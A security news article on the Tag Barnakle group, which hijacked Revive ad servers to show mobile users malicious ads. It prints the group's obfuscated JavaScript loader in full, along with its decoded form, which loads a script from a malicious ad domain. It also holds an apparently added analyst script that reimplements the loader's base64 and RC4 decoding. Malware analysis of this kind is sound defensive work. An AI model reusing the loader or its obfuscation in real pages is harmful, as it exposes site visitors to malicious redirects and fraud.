Millions of web surfers are being targeted by a single malvertising group

Hackers have compromised more than 120 ad servers over the past year in an ongoing campaign that displays malicious ads on tens of millions, if not hundreds of millions, of devices as they visit sites that are otherwise benign.

Malvertising is the practice of serving malicious ads to people as they visit trusted websites. The ads include JavaScript that stealthily exploits software flaws or tries to trick visitors into installing an unsafe application, paying fraudulent computer-support fees, or taking other harmful actions. The scammers behind this internet scourge typically pose as buyers and pay ad-delivery networks to display the malicious ads on individual sites.

Going for the jugular

Gaming the ad system by posing as a legitimate buyer takes resources. Fraudsters must first invest time in learning how the market works and then build an entity with a trustworthy reputation. The approach also requires paying for the ad space where the malicious ads will be displayed. That is not the technique used by a malvertising group that the security firm Confiant calls Tag Barnakle.

"Tag Barnakle, on the other hand, is able to bypass this initial hurdle completely by going straight for the jugular: mass compromise of ad-serving infrastructure," Confiant researcher Eliya Stein wrote in a blog post published on Monday. "It is also possible that they can generate an ROI [return on investment] that outperforms their competitors, because they don't need to spend a single cent to run the advertising campaigns."

Over the past year, Tag Barnakle has compromised more than 120 servers running Revive, an open source application for organizations that want to run their own ad server instead of relying on a third-party service. That is twice the number of infected Revive servers Confiant found last year.

Once it has broken into an ad server, Tag Barnakle loads a malicious payload onto it. To avoid detection, the group uses client-side fingerprinting to ensure that only a small number of the most attractive targets receive the malicious ads. The servers that deliver the secondary payload to those targets also use cloaking techniques so that they, too, stay under the radar.

Here is an overview:


When Confiant reported on Tag Barnakle last year, it found that the group had infected about 60 Revive servers. That foothold let the group distribute ads to more than 360 websites. The ads prompted bogus Adobe Flash updates that, when run, installed malware on desktop computers.

This time, Tag Barnakle is targeting iPhone and Android users. Websites that receive ads through a hacked server are fed heavily obfuscated JavaScript that determines whether the visitor is using an iPhone or an Android device.


If a visitor passes that and other fingerprinting tests, the ad serves a secondary payload that looks like this:

var _0x209b=["charCodeAt","fromCharCode","atob","length"];(function(_0x58f22e,_0x209b77){var _0x3a54d6=function(_0x562d16){while(--_0x562d16){_0x58f22e["push"](_0x58f22e["shift"]());}};_0x3a54d6(++_0x209b77);}(_0x209b,0x1d9));var _0x3a54=function(_0x58f22e,_0x209b77){_0x58f22e=_0x58f22e-0x0;var _0x3a54d6=_0x209b[_0x58f22e];return _0x3a54d6;};function pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){var _0x40b1c0=[],_0xfa98e6=0x0,_0x1d2d3f,_0x4daddb="";for(var _0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0x40b1c0[_0xaefdd9]=_0xaefdd9;}for(_0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9]+_0x4ed28f["charCodeAt"](_0xaefdd9%_0x4ed28f[_0x3a54("0x2")]))%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f;}_0xaefdd9=0x0,_0xfa98e6=0x0;for(var _0x2bdf25=0x0;_0x2bdf25<_0x2df7f1[_0x3a54("0x2")];_0x2bdf25++){_0xaefdd9=(_0xaefdd9+0x1)%0x100,_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9])%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f,_0x4daddb+=String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25)^_0x40b1c0[(_0x40b1c0[_0xaefdd9]+_0x40b1c0[_0xfa98e6])%0x100]);}return _0x4daddb;}function fCp5tRneHK(_0x2deb18){var _0x3d61b2="";try{_0x3d61b2=window[_0x3a54("0x1")](_0x2deb18);}catch(_0x4b0a86){}return _0x3d61b2;};var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"];var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), 
qIxFjKSY6BVD[8]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));var bundle = document.body||document.documentElement;bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

Decoded, the payload is:

var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAtrribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");
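To show how an analyst recovers the decoded stage above without running it in a browser, here is an added example (it is not Confiant's code and not the payload itself) that reimplements the scheme the obfuscated stage uses: each string in the array is base64-decoded and then RC4-decrypted with a key stored in another slot of the same array, which is exactly what the pr7IbU3HZp6 and fCp5tRneHK functions above do. The keys and ciphertexts are constructed for this example rather than copied from the page, and the "async" attribute and "appendChild" method name are assumptions, since the decoded listing above does not show the second setAttribute call's arguments or the final DOM method. The decoded calls are traced against a stub DOM so the injected script URL is captured with no network activity.

```javascript
// Added example for this article; not code from Confiant or the Tag Barnakle
// payload. It reimplements the payload's decoding scheme (base64, then RC4
// with a per-string key) and traces the decoded DOM calls offline.
// Keys and ciphertexts are constructed here; the real array entries from
// the page are not reproduced.

// RC4 over "binary strings" (one char per byte): the same KSA + PRGA that
// the obfuscated pr7IbU3HZp6() function implements.
function rc4(data, key) {
  const S = Array.from({ length: 256 }, (_, i) => i);
  let j = 0;
  for (let i = 0; i < 256; i++) {
    j = (j + S[i] + key.charCodeAt(i % key.length)) % 256;
    [S[i], S[j]] = [S[j], S[i]];
  }
  let i = 0;
  j = 0;
  let out = '';
  for (let k = 0; k < data.length; k++) {
    i = (i + 1) % 256;
    j = (j + S[i]) % 256;
    [S[i], S[j]] = [S[j], S[i]];
    out += String.fromCharCode(data.charCodeAt(k) ^ S[(S[i] + S[j]) % 256]);
  }
  return out;
}

// Node equivalents of window.atob / btoa on binary strings.
const b64decode = (s) => Buffer.from(s, 'base64').toString('latin1');
const b64encode = (s) => Buffer.from(s, 'latin1').toString('base64');

// The payload's idiom: plaintext = RC4(atob(ciphertext), key).
const decodeString = (b64, key) => rc4(b64decode(b64), key);
// Its inverse, used here only to build the constructed sample.
const encodeString = (plain, key) => b64encode(rc4(plain, key));

// Constructed string array laid out like the payload's qIxFjKSY6BVD:
// slots 2, 5, 8 and 11 hold RC4 keys, the other slots hold ciphertexts.
// The key strings are assumptions chosen for this example.
function buildSample() {
  const keyA = 'assumed-key-A', keyB = 'assumed-key-B';
  const keyC = 'assumed-key-C', keyD = 'assumed-key-D';
  const arr = [];
  arr[2] = keyA; arr[5] = keyB; arr[8] = keyC; arr[11] = keyD;
  arr[1] = encodeString('createElement', keyA);
  arr[3] = encodeString('script', keyB);
  arr[4] = encodeString('setAttribute', keyB);
  arr[6] = encodeString('src', keyC);
  arr[7] = encodeString('https://overgalladean[.]com/apu.php?zoneid=2721667', keyC);
  // Assumed: the page's decoded listing does not show the second attribute
  // or the final DOM call, so "async" and "appendChild" are placeholders.
  arr[9] = encodeString('async', keyD);
  arr[0] = encodeString('true', keyA);
  arr[10] = encodeString('appendChild', keyD);
  return arr;
}

// A Proxy that accepts any method name (the payload decides names at run
// time) and records the call instead of touching a real DOM.
function makeRecorder(log, name) {
  return new Proxy({}, {
    get(_, prop) {
      const full = `${name}.${String(prop)}`;
      if (prop === 'body' || prop === 'documentElement') return makeRecorder(log, full);
      return (...args) => {
        log.push([full, ...args.map((a) => (typeof a === 'string' ? a : '<node>'))]);
        return makeRecorder(log, 'el');
      };
    },
  });
}

// The decoded second stage with `document` injected, mirroring the call
// pattern of the obfuscated code: document[..](..); el[..](.., ..); parent[..](el).
function runStage(arr, document) {
  const d = (i, k) => decodeString(arr[i], arr[k]);
  const el = document[d(1, 2)](d(3, 5));
  el[d(4, 5)](d(6, 8), d(7, 8));
  el[d(4, 5)](d(9, 11), d(0, 2));
  const parent = document.body || document.documentElement;
  parent[d(10, 11)](el);
  return el;
}

// Trace the stage offline; return every recorded call and the script src.
function traceStage(arr) {
  const log = [];
  runStage(arr, makeRecorder(log, 'document'));
  const srcCall = log.find(([m, a]) => m === 'el.setAttribute' && a === 'src');
  return { calls: log, scriptSrc: srcCall ? srcCall[2] : null };
}

const TRACE = traceStage(buildSample());
console.log(TRACE.calls);
console.log('injected script:', TRACE.scriptSrc);
```

Run it with node; the trace lists the createElement, setAttribute and append calls and the recovered src. Pointed at the real array, the same decoder works once the key slots are identified from the call pattern (the argument passed as the second parameter of pr7IbU3HZp6 in each call), which is faster than stepping through the rotated lookup table by hand, and the stub DOM means nothing from the ad network is ever fetched.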

As the deobfuscated code shows, the ads are served from overgalladean[.]com, a domain Confiant said is used by PropellerAds, an ad network that security companies including Malwarebytes have long documented as malicious.

When Confiant replayed the PropellerAds click tracker on the types of devices Tag Barnakle was targeting, it saw ads like this:


Tens of millions served

The ads often lure targets to app store listings for fake security, safety, or VPN apps that carry hidden subscription costs or that funnel "traffic off to nefarious ends."

Because ad servers frequently integrate with multiple ad exchanges, the ads can spread widely across hundreds, perhaps thousands, of individual websites. Confiant doesn't know how many end users are being exposed to the malicious ads, but the company believes the number is high.

"If we consider that some of these media companies have [Revive] integrations with leading programmatic advertising platforms, Tag Barnakle's reach is easily in the tens if not hundreds of millions of devices," Stein wrote. "This is a conservative estimate that takes into account the fact that they cloak their victims in order to serve the payload at a low frequency, and potentially that delays the discovery of their presence."
